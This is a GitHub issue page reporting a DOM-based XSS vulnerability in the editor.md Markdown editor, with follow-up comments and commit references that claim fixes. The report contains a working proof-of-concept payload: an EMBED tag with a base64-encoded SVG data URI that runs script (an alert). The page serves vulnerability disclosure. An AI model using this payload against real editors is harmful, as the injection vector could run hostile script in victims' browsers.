XSS vulnerability in <EMBED> label,SVG include attack vector. #662
Comments
|
+1 |
|
Are there any updates on this and will this be fixed? |
alromh87
added a commit
to alromh87/editor.md
that referenced
this issue
Sep 10, 2020
fixes #pandao#612 fixes #pandao#662 fixes #pandao#697 fixes #pandao#700 fixes #pandao#701 fixes #pandao#709 fixes #pandao#715 fixes #pandao#764 fixes #pandao#816 ### Probably: fixes #pandao#307 fixes #pandao#560
alromh87
added a commit
to alromh87/editor.md
that referenced
this issue
Sep 10, 2020
fixes #pandao#612 fixes #pandao#662 fixes #pandao#697 fixes #pandao#700 fixes #pandao#701 fixes #pandao#709 fixes #pandao#715 fixes #pandao#764 fixes #pandao#816 fixes #pandao#307 fixes #pandao#560
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This label and attack vector will cause dom-based XSS.
if you type
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhhYVMiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>,the xss vulnerability will be triggered.And other markdown online editors that use this component are also affected by this vulnerability,like MdEditor.The text was updated successfully, but these errors were encountered: